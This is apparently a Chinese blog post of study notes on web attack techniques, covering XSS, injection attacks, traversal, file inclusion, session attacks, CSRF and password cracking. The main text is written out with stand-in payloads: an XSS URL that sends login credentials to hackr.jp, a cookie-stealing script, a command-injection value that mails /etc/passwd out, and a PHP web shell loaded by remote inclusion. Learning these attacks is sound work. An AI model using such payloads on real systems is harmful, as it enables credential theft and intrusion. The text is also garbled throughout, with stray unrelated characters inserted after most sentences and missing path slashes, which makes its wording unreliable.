web的攻擊技術(shù)

嗯......→_→基本為《圖解http》筆記

導(dǎo)言:

簡單的HTTP協(xié)議本身并不存在安全性問題着降,因此協(xié)議本身幾乎不會(huì)成為攻擊的對(duì)象硝枉。應(yīng)用HTTP協(xié)議的服務(wù)器和客戶端,以及運(yùn)行在服務(wù)器上的Web應(yīng)用等資源才是攻擊目標(biāo)粮宛。本文主要針對(duì)web應(yīng)用的攻擊技術(shù)來進(jìn)行講解烹玉。

針對(duì)web應(yīng)用的攻擊模式:

  • 主動(dòng)攻擊
  • 被動(dòng)攻擊
主動(dòng)攻擊(active attack):

指攻擊者通過直接訪問Web應(yīng)用,把攻擊代碼傳入的攻擊模式钞馁。由于該模式是直接針對(duì)服務(wù)器上的資源進(jìn)行攻擊虑省,因此攻擊者需要能夠訪問到那些資源,主動(dòng)攻擊模式里具有代表性的攻擊是SQL注入攻擊和OS命令注入攻擊

被動(dòng)攻擊(passive attack):

指利用圈套策略執(zhí)行攻擊代碼的攻擊模式僧凰。在被動(dòng)攻擊過程中探颈,攻擊者不直接對(duì)目標(biāo)Web應(yīng)用訪問發(fā)起攻擊
被動(dòng)攻擊通常的攻擊模式步驟如下所示:

  1. 攻擊者誘使用戶觸發(fā)已設(shè)置好的陷阱,而陷阱會(huì)啟動(dòng)發(fā)送已嵌入攻擊代碼的HTTP請(qǐng)求
  2. 當(dāng)用戶不知不覺中招之后训措,用戶的瀏覽器或郵件客戶端就會(huì)觸發(fā)這個(gè)陷阱
  3. 中招后的用戶瀏覽器會(huì)把含有攻擊代碼的HTTP請(qǐng)求發(fā)送給作為攻擊目標(biāo)的Web應(yīng)用伪节,運(yùn)行攻擊代碼
  4. 執(zhí)行完攻擊代碼,存在安全漏洞的Web應(yīng)用會(huì)成為攻擊者的跳板隙弛,可能導(dǎo)致用戶所持的Cookie等個(gè)人信息被竊取架馋,登錄狀態(tài)中的用戶權(quán)限遭惡意濫用等后果

被動(dòng)攻擊模式中具有代表性的攻擊是跨站腳本攻擊(XSS)跨站點(diǎn)請(qǐng)求偽造(CSRF)
利用被動(dòng)攻擊,可發(fā)起對(duì)原本從互聯(lián)網(wǎng)上無法直接訪問的企業(yè)內(nèi)網(wǎng)等網(wǎng)絡(luò)的攻擊全闷。

安全漏洞一:輸出值轉(zhuǎn)義不完全

保留客戶端驗(yàn)證只是為了盡早地辨識(shí)輸入錯(cuò)誤叉寂,起到提高UI體驗(yàn)的作用,從數(shù)據(jù)庫或文件系統(tǒng)总珠、HTML屏鳍、郵件等輸出Web應(yīng)用處理的數(shù)據(jù)之際,針對(duì)輸出做值轉(zhuǎn)義處理是一項(xiàng)至關(guān)重要的安全策略局服。當(dāng)輸出值轉(zhuǎn)義不完全時(shí)钓瞭,會(huì)因觸發(fā)攻擊者傳入的攻擊代碼,而給輸出對(duì)象帶來損害

攻擊方式1:跨站腳本攻擊(被動(dòng)攻擊)

跨站腳本攻擊(Cross-Site Scripting淫奔,XSS)是指通過存在安全漏洞的Web網(wǎng)站注冊(cè)用戶的瀏覽器內(nèi)運(yùn)行非法的HTML標(biāo)簽或JavaScript進(jìn)行的一種攻擊山涡。
  動(dòng)態(tài)創(chuàng)建的HTML部分有可能隱藏著安全漏洞。就這樣,攻擊者編寫腳本設(shè)下陷阱鸭丛,用戶在自己的瀏覽器上運(yùn)行時(shí)竞穷,一不小心就會(huì)受到被動(dòng)攻擊。

刪除線顯示出來并不會(huì)造成太大的不利后果鳞溉,但如果換成使用script標(biāo)簽將會(huì)如何呢

下圖網(wǎng)站通過地址欄中URI的查詢字段指定ID瘾带,即相當(dāng)于在表單內(nèi)自動(dòng)填寫字符串的功能。而就在這個(gè)地方熟菲,隱藏著可執(zhí)行跨站腳本攻擊的漏洞

充分熟知此處漏洞特點(diǎn)的攻擊者看政,于是就創(chuàng)建了下面這段嵌入惡意代碼的URL。并隱藏植入事先準(zhǔn)備好的欺詐郵件中或Web頁面內(nèi)抄罕,誘使用戶去點(diǎn)擊該URL
http://example.jp/login?ID="><script>var+f=document.getElementById("login");+f.action="http://hackr.jp/pwget";+f.method="get";</script><span+s="
瀏覽器打開該URI后允蚣,直觀感覺沒有發(fā)生任何變化,但設(shè)置好的腳本卻偷偷開始運(yùn)行了贞绵。當(dāng)用戶在表單內(nèi)輸入ID和密碼之后厉萝,就會(huì)直接發(fā)送到攻擊者的網(wǎng)站(也就是hackr.jp),導(dǎo)致個(gè)人登錄信息被竊取
之后榨崩,ID及密碼會(huì)傳給該正規(guī)網(wǎng)站谴垫,接下來仍然按正常登錄步驟,但是用戶很難意識(shí)到自己的登錄信息已泄露
除了在表單中設(shè)下圈套之外母蛛,下面那種惡意構(gòu)造的腳本同樣能夠以跨站腳本攻擊的方式翩剪,竊取到用戶的Cookie信息
<script src=http://hackr.jp/xss.js></script>
js文件代碼為

var content = escape(document.cookie);
document.write("<img src=http://hackr.jp/?");
document.write(content); 
document.write(">");
攻擊方式2:SQL注入攻擊

SQL注入(SQL Injection)是指針對(duì)Web應(yīng)用使用的數(shù)據(jù)庫,通過運(yùn)行非法的SQL而產(chǎn)生的攻擊彩郊。該安全隱患有可能引發(fā)極大的威脅前弯,有時(shí)會(huì)直接導(dǎo)致個(gè)人信息及機(jī)密信息的泄露
SQL注入案例,此處把flag=1這個(gè)條件直接無視掉了
攻擊方式3:OS命令注入攻擊

OS命令注入攻擊(OS Command Injection)是指通過Web應(yīng)用,執(zhí)行非法的操作系統(tǒng)命令達(dá)到攻擊的目的秫逝。只要在能調(diào)用Shell函數(shù)的地方就有存在被攻擊的風(fēng)險(xiǎn)恕出,也就是說,通過OS注入攻擊可執(zhí)行OS上安裝著的各種程序违帆。

下面以咨詢表單的發(fā)送功能為例浙巫,講解OS注入攻擊。該功能可將用戶的咨詢郵件按已填寫的對(duì)方郵箱地址發(fā)送過去
OS注入案例
下面摘選處理該表單內(nèi)容的一部分核心代碼
my $adr = $q->param('mailaddress');
open(MAIL, "| usrsbin/sendmail $adr");
print MAIL "From: info@example.com\n"

程序中的open函數(shù)會(huì)調(diào)用sendmail命令發(fā)送郵件刷后,而指定的郵件發(fā)送地址即$adr的值
攻擊者將下面的值指定作為郵件地址
;cat /etc/passwd | mail hack@example.jp
程序接收該值的畴,構(gòu)成以下的命令組合
| usrsbin/sendmail ; cat /etc/passwd | mail hack@example.jp
攻擊者的輸入值中含有分號(hào)(;)。這個(gè)符號(hào)在OS命令中尝胆,會(huì)被解析為分隔多個(gè)執(zhí)行命令的標(biāo)記
  可見丧裁,sendmail命令執(zhí)行被分隔后,接下去就會(huì)執(zhí)行 cat etcpasswd | mail hack@example.jp這樣的命令了含衔。結(jié)果煎娇,含有Linux賬戶信息etcpasswd的文件二庵,就以郵件形式發(fā)送給了hack@example.jp

攻擊方式4:HTTP首部注入攻擊

HTTP首部注入攻擊(HTTPHeader Injection)是指攻擊者通過在響應(yīng)首部字段內(nèi)插入換行,添加任意響應(yīng)首部或主體的一種攻擊逊桦。屬于被動(dòng)攻擊模式
  向首部主體內(nèi)添加內(nèi)容的攻擊稱為HTTP響應(yīng)截?cái)喙?HTTPResponse Splitting Attack)

攻擊者以下面的內(nèi)容替代之前的類別ID后發(fā)送請(qǐng)求
101%0D%0ASet-Cookie:+SID=123456789
其中眨猎,%0D%0A代表HTTP報(bào)文中的換行符,緊接著的是可強(qiáng)制將攻擊者網(wǎng)站http://hackr.jp/的會(huì)話ID設(shè)置成SID=123456789的Set-Cookie首部字段强经。
發(fā)送該請(qǐng)求之后,假設(shè)結(jié)果返回以下響應(yīng)

Location:http://example.com/?cat=101(%0D%0A:換行符)
Set-Cookie:SID=123456789

此刻寺渗,首部字段Set-Cookie已生效匿情,因此攻擊者可指定修改任意的Cookie信息。通過和會(huì)話固定攻擊(攻擊者可使用指定的會(huì)話ID)攻擊組合炬称,攻擊者可偽裝成用戶
  攻擊者輸入的%0D%0A涡拘,原本應(yīng)該屬于首部字段Location的查詢值部分,但經(jīng)過解析后鳄乏,%0D%0A變成了換行符跷车,結(jié)果插入了新的首部字段
  這樣一來橱野,攻擊者可在響應(yīng)中插入任意的首部字段
HTTP響應(yīng)截?cái)喙?/strong>是用在HTTP首部注入的一種攻擊。攻擊順序相同水援,但是要將兩個(gè)%0D%0A%0D%0A并排插入字符串后發(fā)送密强。利用這兩個(gè)連續(xù)的換行就可作出HTTP首部與主體分隔所需的空行了蜗元,這樣就能顯示偽造的主體,達(dá)到攻擊目的薪鹦。這樣的攻擊叫做HTTP響應(yīng)截?cái)喙?/p>

%0D%0A%0D%0A<HTML><HEAD><TITLE>之后成畦,想要顯示的網(wǎng)頁內(nèi)容<!--

在可能進(jìn)行HTTP首部注入的環(huán)節(jié)循帐,通過發(fā)送上面的字符串,返回結(jié)果得到以下這種響應(yīng)

Set-Cookie: UID=(%0D%0A :換行符)
(%0D%0A :換行符)
<HTML><HEAD><TITLE>之后离斩,想要顯示的網(wǎng)頁內(nèi)容<!--(原來頁面對(duì)應(yīng)的首部字段和主體部分全視為注釋)

利用這個(gè)攻擊跛梗,已觸發(fā)陷阱的用戶瀏覽器會(huì)顯示偽造的Web頁面,再讓用戶輸入自己的個(gè)人信息等诚欠,可達(dá)到和跨站腳本攻擊相同的效果
  另外轰绵,濫用HTTP/1.1中匯集多響應(yīng)返回功能尼荆,會(huì)導(dǎo)致緩存服務(wù)器對(duì)任意內(nèi)容進(jìn)行緩存操作。這種攻擊稱為緩存污染捅儒。使用該緩存服務(wù)器的用戶巧还,在瀏覽遭受攻擊的網(wǎng)站時(shí)狞悲,會(huì)不斷地瀏覽被替換掉的Web網(wǎng)頁

攻擊方式5:郵件首部注入攻擊

下面以Web頁面中的咨詢表單為例講解郵件首部注入攻擊。該功能可在表單內(nèi)填入咨詢者的郵件地址及咨詢內(nèi)容后丹拯,以郵件的形式發(fā)送給網(wǎng)站管理員

攻擊者將以下數(shù)據(jù)作為郵件地址發(fā)起請(qǐng)求
bob@hackr.jp%0D%0ABcc:user@example.com
%0D%0A在郵件報(bào)文中代表換行符乖酬。一旦咨詢表單所在的Web應(yīng)用接收了這個(gè)換行符咬像,就可能實(shí)現(xiàn)對(duì)Bcc郵件地址的追加發(fā)送生宛,而這原本是無法指定的
另外像下面一樣陷舅,使用兩個(gè)連續(xù)的換行符就有可能篡改郵件文本內(nèi)容并發(fā)送
bob@hackr.jp%0D%0A%0D%0ATest Message
再以相同的方法,就有可能改寫To和Subject等任意郵件首部莱睁,或向文本添加附件等動(dòng)作

攻擊方式6:目錄遍歷攻擊

目錄遍歷(Directory Traversal)攻擊是指對(duì)本無意公開的文件目錄,通過非法截?cái)嗥淠夸浡窂胶蟪栈蓿_(dá)成訪問目的的一種攻擊琳彩。這種攻擊有時(shí)也稱為路徑遍歷(Path Traversal)攻擊 , 固然存在輸出值轉(zhuǎn)義的問題汁针,但更應(yīng)該關(guān)閉指定對(duì)任意文件名的訪問權(quán)限
下面以顯示讀取文件功能為例施无,講解目錄遍歷攻擊必孤。該功能通過以下查詢字段敷搪,指定某個(gè)文件名赡勘。然后從www/log/文件目錄下讀取這個(gè)指定的文件
http://example.com/read.php?log=0401.log
攻擊者設(shè)置如下查詢字段后發(fā)出請(qǐng)求
http://example.com/read.php?log=../..etcpasswd
查詢字段為了讀取攻擊者盯上的etcpasswd文件,會(huì)從wwwlog/目錄開始定位相對(duì)路徑毙替。如果這份read.php腳本接受對(duì)指定目錄的訪問請(qǐng)求處理厂画,那原本不公開的文件就存在可被訪問的風(fēng)險(xiǎn)

攻擊方式7:遠(yuǎn)程文件包含漏洞

遠(yuǎn)程文件包含漏洞(Remote File Inclusion)是指當(dāng)部分腳本內(nèi)容需要從其他文件讀入時(shí)袱院,攻擊者利用指定外部服務(wù)器的URL充當(dāng)依賴文件瞭稼,讓腳本讀取之后环肘,就可運(yùn)行任意腳本的一種攻擊 , 主要是PHP存在的安全漏洞 , 固然存在輸出值轉(zhuǎn)義的問題廷臼,但更應(yīng)控制對(duì)任意文件名的指定
下面以include讀入由查詢字段指定文件的功能為例绝页,講解遠(yuǎn)程文件包含漏洞续誉。該功能可通過以下查詢字段形式指定文件名酷鸦,并在腳本內(nèi)的include語句處讀入這個(gè)指定文件
http://example.com/foo.php?mod=news.php
對(duì)應(yīng)腳本的源代碼如下所示
http://example.com/foo.php的源代碼(部分摘錄)

$modname=$_GET['mod'];
include($modname);

攻擊者指定如同下面形式的URL發(fā)出請(qǐng)求
http://example.com/foo.php?mod=http://hackr.jp/cmd.php&cmd=ls
攻擊者已事先在外部服務(wù)器上準(zhǔn)備了以下這段腳本
http://hackr.jp/cmd.php的源代碼
<?system($_GET['cmd'])?>
假設(shè)Web服務(wù)器(example.com)的include可以引入外部服務(wù)器的URL臼隔,那就會(huì)讀入攻擊者在外部服務(wù)器上事先準(zhǔn)備的URL(http://hackr.jp/cmd.php)妄壶。結(jié)果丁寄,通過system函數(shù)就能在Web服務(wù)器(example.com)上執(zhí)行查詢字段指定的OS命令了

安全漏洞二:設(shè)置或設(shè)計(jì)上有缺陷

指錯(cuò)誤設(shè)置web服務(wù)器伊磺,或是由設(shè)計(jì)上的一些問題引發(fā)的安全漏洞

攻擊方式1:強(qiáng)制瀏覽

對(duì)那些原本不愿公開的文件屑埋,為了保證安全會(huì)隱蔽其URL⌒拢可一旦知道了那些URL袜刷,也就意味著可瀏覽URL對(duì)應(yīng)的文件莺丑。直接顯示容易推測(cè)的文件名或文件目錄索引時(shí)梢莽,通過某些方法可能會(huì)使URL產(chǎn)生泄露
例如通過
http://www.example.com/entry/entry_081202.log
可以推出下一個(gè)文件是
http://www.example.com/entry/entry_081203.log
解決方案 : 直接通過URL訪問原本必須經(jīng)過認(rèn)證才能在Web頁面上使用的文件(HTML文件昏名、圖片、PDF等文檔洪鸭、CSS以及其他數(shù)據(jù)等)

攻擊方式2:不正確的錯(cuò)誤消息處理

簡而言之 , 這個(gè)說的就是程序出錯(cuò)或者業(yè)務(wù)出錯(cuò)一般都會(huì)爆出很具體很嚴(yán)謹(jǐn)?shù)腻e(cuò)誤信息 , 但是這個(gè)信息暴露給客戶端就不太好 , 會(huì)被人利用 , 給攻擊者啟發(fā) , 我們要控制好提供給客戶端信息的度

攻擊方式3:開放重定向

攻擊者把重定向指定的參數(shù)改寫成已設(shè)好陷阱的Web網(wǎng)站對(duì)應(yīng)的連接览爵,如下所示
http://example.com/?redirect=http://hackr.jp
用戶看到URL后原以為訪問example.com蜓竹,不料實(shí)際上被誘導(dǎo)至hackr.jp這個(gè)指定的重定向目標(biāo)
可信度高的Web網(wǎng)站如果開放重定向功能,則很有可能被攻擊者選中并用來作為釣魚攻擊的跳板

安全漏洞三:會(huì)話(session)管理疏忽

會(huì)話管理是用來管理用戶狀態(tài)的必備功能嘶是,但是如果在會(huì)話管理上有所疏忽聂喇,就會(huì)導(dǎo)致用戶的認(rèn)證狀態(tài)被竊取等后果

攻擊方式1:會(huì)話劫持

會(huì)話劫持(Session Hijack)是指攻擊者通過某種手段拿到了用戶的會(huì)話ID授帕,并非法使用此會(huì)話ID偽裝成用戶浮梢,達(dá)到攻擊的目的
會(huì)話劫持

列舉幾種攻擊者可獲得會(huì)話ID的途徑:

  • 通過非正規(guī)的生成方法推測(cè)會(huì)話ID;
  • 通過竊聽或XSS攻擊盜取會(huì)話ID洲尊;
  • 通過會(huì)話固定攻擊(Session Fixation)強(qiáng)行獲取會(huì)話ID

下面我們以認(rèn)證功能為例講解會(huì)話劫持坞嘀。這里的認(rèn)證功能通過會(huì)話管理機(jī) 制丽涩,會(huì)將成功認(rèn)證的用戶的會(huì)話ID(SID)保存在用戶瀏覽器的Cookie中
會(huì)話劫持攻擊案例

攻擊者在得知該Web網(wǎng)站存在可跨站攻擊(XSS)的安全漏洞后矢渊,就設(shè)置好用JavaScript腳本調(diào)用document.cookie以竊取Cookie信息的陷阱矮男,一旦用戶踏入陷阱(訪問了該腳本),攻擊者就能獲取含有會(huì)話ID的Cookie
  攻擊者拿到用戶的會(huì)話ID后崔泵,往自己的瀏覽器的Cookie中設(shè)置該會(huì)話ID憎瘸,即可偽裝成會(huì)話ID遭竊的用戶,訪問Web網(wǎng)站了

攻擊方式2:會(huì)話固定攻擊(被動(dòng)攻擊)

對(duì)以竊取目標(biāo)會(huì)話ID為主動(dòng)攻擊手段的會(huì)話劫持而言崎弃,會(huì)話固定攻擊(Session Fixation)攻擊會(huì)強(qiáng)制用戶使用攻擊者指定的會(huì)話ID
下面我們以認(rèn)證功能為例講解會(huì)話固定攻擊饲做。這個(gè)Web網(wǎng)站的認(rèn)證功能盆均,會(huì)在認(rèn)證前發(fā)布一個(gè)會(huì)話ID漱逸,若認(rèn)證成功饰抒,就會(huì)在服務(wù)器內(nèi)改變認(rèn)證狀態(tài)

會(huì)話固定攻擊案例

攻擊者準(zhǔn)備陷阱袋坑,先訪問Web網(wǎng)站拿到會(huì)話ID(SID=f5d1278e8109)枣宫。此刻,會(huì)話ID在服務(wù)器上的記錄仍是(未認(rèn)證)狀態(tài)洋幻。(步驟①~②)
  攻擊者設(shè)置好強(qiáng)制用戶使用該會(huì)話ID的陷阱文留,并等待用戶拿著這個(gè)會(huì)話ID前去認(rèn)證厂庇。一旦用戶觸發(fā)陷阱并完成認(rèn)證输吏,會(huì)話ID(SID=f5d1278e8109)在服務(wù)器上的狀態(tài)(用戶A已認(rèn)證)就會(huì)被記錄下來。(步驟③)
  攻擊者估計(jì)用戶差不多已觸發(fā)陷阱后躲查,再利用之前這個(gè)會(huì)話ID訪問網(wǎng)站镣煮。由于該會(huì)話ID目前已是(用戶A已認(rèn)證)狀態(tài)鄙麦,于是攻擊者作為用戶A的身份順利登錄網(wǎng)站胯府。(步驟④)
Session Adoption
  Session Adoption是指PHP或ASP.NET能夠接收處理未知會(huì)話ID的功能
  惡意使用該功能便可跳過會(huì)話固定攻擊的準(zhǔn)備階段骂因,從Web網(wǎng)站獲得發(fā)行的會(huì)話ID的步驟寒波。即,攻擊者可私自創(chuàng)建會(huì)話ID構(gòu)成陷阱绸栅,中間件卻會(huì)誤以為該會(huì)話ID是未知會(huì)話ID而接受

攻擊方式3:跨站點(diǎn)請(qǐng)求偽造(被動(dòng)攻擊)

跨站點(diǎn)請(qǐng)求偽造(Cross-Site Request Forgeries阴幌,CSRF)攻擊是指攻擊者通過設(shè)置好的陷阱,強(qiáng)制對(duì)已完成認(rèn)證的用戶進(jìn)行非預(yù)期的個(gè)人信息或設(shè)定信息等某些狀態(tài) 更新
  跨站點(diǎn)請(qǐng)求偽造有可能會(huì)造成以下等影響:利用已通過認(rèn)證的用戶權(quán)限更新設(shè)定信息等蟆豫;利用已通過認(rèn)證的用戶權(quán)限購買商品懒闷;利用已通過認(rèn)證的用戶權(quán)限在留言板上發(fā)表言論

下面以留言板功能為例愤估,講解跨站點(diǎn)請(qǐng)求偽造玩焰。該功能只允許已認(rèn)證并登錄的用戶在留言板上發(fā)表內(nèi)容
跨站點(diǎn)請(qǐng)求偽造攻擊案例
在該留言板系統(tǒng)上昔园,受害者用戶A是已認(rèn)證狀態(tài)。它的瀏覽器中的Cookie持有已認(rèn)證的會(huì)話ID(步驟①)
  攻擊者設(shè)置好一旦用戶訪問逃魄,即會(huì)發(fā)送在留言板上發(fā)表非主觀行為產(chǎn)生的評(píng)論的請(qǐng)求的陷阱澜搅。用戶A的瀏覽器執(zhí)行完陷阱中的請(qǐng)求后勉躺,留言板上也就會(huì)留下那條評(píng)論(步驟②)

觸發(fā)陷阱之際赂蕴,如果用戶A尚未通過認(rèn)證概说,則無法利用用戶A的身份權(quán)限在留言板上發(fā)表內(nèi)容

安全漏洞四:其他

攻擊方式1:密碼破解

密碼破解有以下兩種手段:通過網(wǎng)絡(luò)的密碼試錯(cuò)糖赔;對(duì)已加密密碼的破解(指攻擊者入侵系統(tǒng),已獲得加密或散列處理的密碼數(shù)據(jù)的情況)
  除去突破認(rèn)證的攻擊手段逝变,還有SQL注入攻擊逃避認(rèn)證壳影,跨站腳本攻擊竊取密碼信息等方法

密碼試錯(cuò):

  • 窮舉法(Brute-force Attack宴咧,又稱暴力破解法)是指對(duì)所有密鑰集合構(gòu)成的 密鑰空間(Keyspace)進(jìn)行窮舉掺栅。比如銀行采用的個(gè)人識(shí)別碼是由“4位數(shù)字”組成的密碼氧卧,那么就要從0000~9999中的全部數(shù)字逐個(gè)進(jìn)行嘗試氏堤。從現(xiàn)實(shí)角度考量,攻擊是失敗的熏瞄。
  • 字典攻擊是指利用事先收集好的候選密碼(經(jīng)過各種組合方式后存入字典)谬以,枚舉字典中的密碼为黎,嘗試通過認(rèn)證的一種攻擊手法铭乾,還是舉銀行采用個(gè)人識(shí)別碼是“4位數(shù)字”的密碼的例子炕檩,考慮到用戶使用自己的生日做密碼的可能性較高笛质,于是就可以把生日日期數(shù)值化,如將0101~1231保存成字典跷究,進(jìn)行嘗試

對(duì)已加密密碼的破解:

  • 通過窮舉法·字典攻擊進(jìn)行類推

    針對(duì)密碼使用散列函數(shù)進(jìn)行加密處理的情況俊马,采用和窮舉法或字典攻擊相同的手法柴我,嘗試調(diào)用相同的散列函數(shù)加密候選密碼屯换,然后把計(jì)算出的散列值與目標(biāo)散列值匹配,類推出密碼
  • 彩虹表
    彩虹表(Rainbow Table)是由明文密碼及與之對(duì)應(yīng)的散列值構(gòu)成的一張數(shù)據(jù) 庫表索守,是一種通過事先制作龐大的彩虹表卵佛,可在窮舉法·字典攻擊等實(shí)際破解過程中縮短消耗時(shí)間的技巧截汪。從彩虹表內(nèi)搜索散列值就可以推導(dǎo)出對(duì)應(yīng)的明文密碼衙解。

    為了提高攻擊成功率蚓峦,擁有一張海量數(shù)據(jù)的彩虹表就成了必不可少的條件暑椰。例如在Free Rainbow Tables 網(wǎng)站上公布的一張由大小寫字母及數(shù)字全排列的1~8位字符串對(duì)應(yīng)的MD5散列值構(gòu)成的彩虹表一汽,其大小約為1050吉字節(jié)召夹。

  • 拿到密鑰
    使用共享密鑰加密方式對(duì)密碼數(shù)據(jù)進(jìn)行加密處理的情況下,如果能通過某種手段拿到加密使用的密鑰均驶,也就可以對(duì)密碼數(shù)據(jù)解密了

  • 加密算法的漏洞
    考慮到加密算法本身可能存在的漏洞妇穴,利用該漏洞嘗試解密也是一種可行的方法腾它。但是要找到那些已廣泛使用的加密算法的漏洞瞒滴,又談何容易妓忍,因此困 難極大世剖,不易成功
    而Web應(yīng)用開發(fā)者獨(dú)立實(shí)現(xiàn)的加密算法笤虫,想必尚未經(jīng)過充分的驗(yàn)證,還是 很有可能存在漏洞的

攻擊方式2:點(diǎn)擊劫持

點(diǎn)擊劫持(Click jack ing)是指利用透明的按鈕或鏈接做成陷阱惠况,覆蓋在Web頁面之上稠屠。然后誘使用戶在不知情的情況下完箩,點(diǎn)擊那個(gè)鏈接訪問內(nèi)容的一種攻擊手段弊知。這種行為又稱為界面?zhèn)窝b(UI Redressing)

攻擊方式3:Dos攻擊

DoS 攻擊(Denial of Serv ice attack)是一種讓運(yùn)行中的服務(wù)呈停止?fàn)顟B(tài)的攻擊秩彤。有時(shí)也叫做服務(wù)停止攻擊或拒絕服務(wù)攻擊漫雷。DoS攻擊的對(duì)象不僅限于Web網(wǎng)站鳍咱,還包括網(wǎng)絡(luò)設(shè)備及服務(wù)器等
  主要有以下兩種DoS攻擊方式:

  • 集中利用訪問請(qǐng)求造成資源過載降盹,資源用盡的同時(shí),實(shí)際上服務(wù)也就呈停止?fàn)顟B(tài)谤辜;
  • 通過攻擊安全漏洞使服務(wù)停止
      其中蓄坏,集中利用訪問請(qǐng)求的DoS攻擊,單純來講就是發(fā)送大量的合法請(qǐng)求丑念。服務(wù)器很難分辨何為正常請(qǐng)求涡戳,何為攻擊請(qǐng)求,因此很難防止DoS攻擊
攻擊方式4:后門程序

后門程序(Backdoor)是指開發(fā)設(shè)置的隱藏入口脯倚,可不按正常步驟使用受限功能。利用后門程序就能夠使用原本受限制的功能推正。
  通常的后門程序分為以下3種類型:

  • 開發(fā)階段作為Debug調(diào)用的后門程序恍涂;
  • 開發(fā)者為了自身利益植入的后門程序;
  • 攻擊者通過某種方法設(shè)置的后門程序植榕。
      可通過監(jiān)視進(jìn)程和通信的狀態(tài)發(fā)現(xiàn)被植入的后門程序再沧。但設(shè)定在Web應(yīng)用中的后門程序,由于和正常使用時(shí)區(qū)別不大内贮,通常很難發(fā)現(xiàn)产园。
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市夜郁,隨后出現(xiàn)的幾起案子什燕,更是在濱河造成了極大的恐慌,老刑警劉巖竞端,帶你破解...
    沈念sama閱讀 222,183評(píng)論 6 516
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件屎即,死亡現(xiàn)場離奇詭異,居然都是意外死亡事富,警方通過查閱死者的電腦和手機(jī)技俐,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,850評(píng)論 3 399
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來统台,“玉大人雕擂,你說我怎么就攤上這事〖” “怎么了井赌?”我有些...
    開封第一講書人閱讀 168,766評(píng)論 0 361
  • 文/不壞的土叔 我叫張陵,是天一觀的道長贵扰。 經(jīng)常有香客問我仇穗,道長,這世上最難降的妖魔是什么戚绕? 我笑而不...
    開封第一講書人閱讀 59,854評(píng)論 1 299
  • 正文 為了忘掉前任纹坐,我火速辦了婚禮,結(jié)果婚禮上舞丛,老公的妹妹穿的比我還像新娘耘子。我一直安慰自己,他們只是感情好瓷马,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,871評(píng)論 6 398
  • 文/花漫 我一把揭開白布拴还。 她就那樣靜靜地躺著,像睡著了一般欧聘。 火紅的嫁衣襯著肌膚如雪片林。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,457評(píng)論 1 311
  • 那天怀骤,我揣著相機(jī)與錄音费封,去河邊找鬼。 笑死蒋伦,一個(gè)胖子當(dāng)著我的面吹牛弓摘,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播痕届,決...
    沈念sama閱讀 40,999評(píng)論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼韧献,長吁一口氣:“原來是場噩夢(mèng)啊……” “哼末患!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起锤窑,我...
    開封第一講書人閱讀 39,914評(píng)論 0 277
  • 序言:老撾萬榮一對(duì)情侶失蹤璧针,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后渊啰,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體探橱,經(jīng)...
    沈念sama閱讀 46,465評(píng)論 1 319
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,543評(píng)論 3 342
  • 正文 我和宋清朗相戀三年绘证,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了隧膏。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,675評(píng)論 1 353
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡嚷那,死狀恐怖胞枕,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情车酣,我是刑警寧澤曲稼,帶...
    沈念sama閱讀 36,354評(píng)論 5 351
  • 正文 年R本政府宣布,位于F島的核電站湖员,受9級(jí)特大地震影響贫悄,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜娘摔,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,029評(píng)論 3 335
  • 文/蒙蒙 一窄坦、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧凳寺,春花似錦鸭津、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,514評(píng)論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至晒奕,卻和暖如春闻书,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背脑慧。 一陣腳步聲響...
    開封第一講書人閱讀 33,616評(píng)論 1 274
  • 我被黑心中介騙來泰國打工魄眉, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人闷袒。 一個(gè)月前我還...
    沈念sama閱讀 49,091評(píng)論 3 378
  • 正文 我出身青樓坑律,卻偏偏與公主長得像,于是被迫代替她去往敵國和親囊骤。 傳聞我的和親對(duì)象是個(gè)殘疾皇子晃择,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,685評(píng)論 2 360

推薦閱讀更多精彩內(nèi)容